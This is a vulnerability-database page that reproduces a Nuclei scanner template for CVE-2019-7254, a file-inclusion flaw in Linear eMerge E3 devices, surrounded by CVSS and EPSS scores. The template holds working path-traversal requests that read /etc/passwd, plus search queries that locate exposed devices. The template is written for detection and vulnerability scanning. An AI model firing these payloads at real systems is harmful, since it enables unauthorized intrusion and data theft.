Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-7254
HistoryJun 13, 2021 - 10:05 a.m.

eMerge E3 1.00-06 - Local File Inclusion

2021-06-1310:05:02
ProjectDiscovery
github.com
6

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.4 High

AI Score

Confidence

High

0.808 High

EPSS

Percentile

98.4%

Linear eMerge E3-Series devices are vulnerable to local file inclusion.

id: CVE-2019-7254

info:
  name: eMerge E3 1.00-06 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Linear eMerge E3-Series devices are vulnerable to local file inclusion.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
  remediation: |
    Apply the latest security patch or update to a non-vulnerable version of eMerge E3.
  reference:
    - https://www.exploit-db.com/exploits/47616
    - https://applied-risk.com/labs/advisories
    - https://www.applied-risk.com/resources/ar-2019-005
    - http://packetstormsecurity.com/files/155252/Linear-eMerge-E3-1.00-06-Directory-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7254
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-7254
    cwe-id: CWE-22
    epss-score: 0.85153
    epss-percentile: 0.9853
    cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: nortekcontrol
    product: linear_emerge_essential_firmware
    shodan-query: http.title:"emerge"
    fofa-query: title="emerge"
    google-query: intitle:"emerge"
  tags: cve,cve2019,emerge,lfi,edb,packetstorm,nortekcontrol

http:
  - method: GET
    path:
      - "{{BaseURL}}/?c=../../../../../../etc/passwd%00"
      - "{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220085b3fea4d491469230f2da70524c626ba672737c3c2e9066c243d06910194f9022100bf154d2a0325b65861a5f19e21cdf45f3c1f0bf06477f6ab7d7dfbdb325a0365:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.4 High

AI Score

Confidence

High

0.808 High

EPSS

Percentile

98.4%